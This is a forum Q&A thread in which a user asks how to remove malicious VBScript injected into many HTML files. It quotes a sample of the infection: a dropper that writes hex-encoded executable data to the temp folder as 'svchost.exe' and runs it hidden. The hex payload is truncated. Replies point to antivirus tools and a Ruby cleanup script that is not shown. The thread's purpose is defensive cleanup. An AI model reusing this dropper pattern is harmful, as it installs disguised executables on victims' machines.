I have few html files on my computer, that I borrowed from a friend, unfortunately all the files are infected, they all have malicious vbscript code inserted into the source. I have 100s of files and can't edit the source for all files. Is there a way I can remove the malicious script and still get the data?
Edit: Here is the sample of the code
<script language="VBScript"><!--
DropFileName = "svchost.exe"
WriteData = "4D5A9000030000000400........................8CB03FA48CB03"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
Is it safe to upload it online?
There are lot of antivirus software that'll detect this virus and remove the infected html files.
You can ran the following ruby script which will detect that bad vbscript tag and remove it.
Install Ruby, copy this script in some file( lets say virus_killer.rb ). Browse to location on this file in cmd( if you are in window ) and run this command.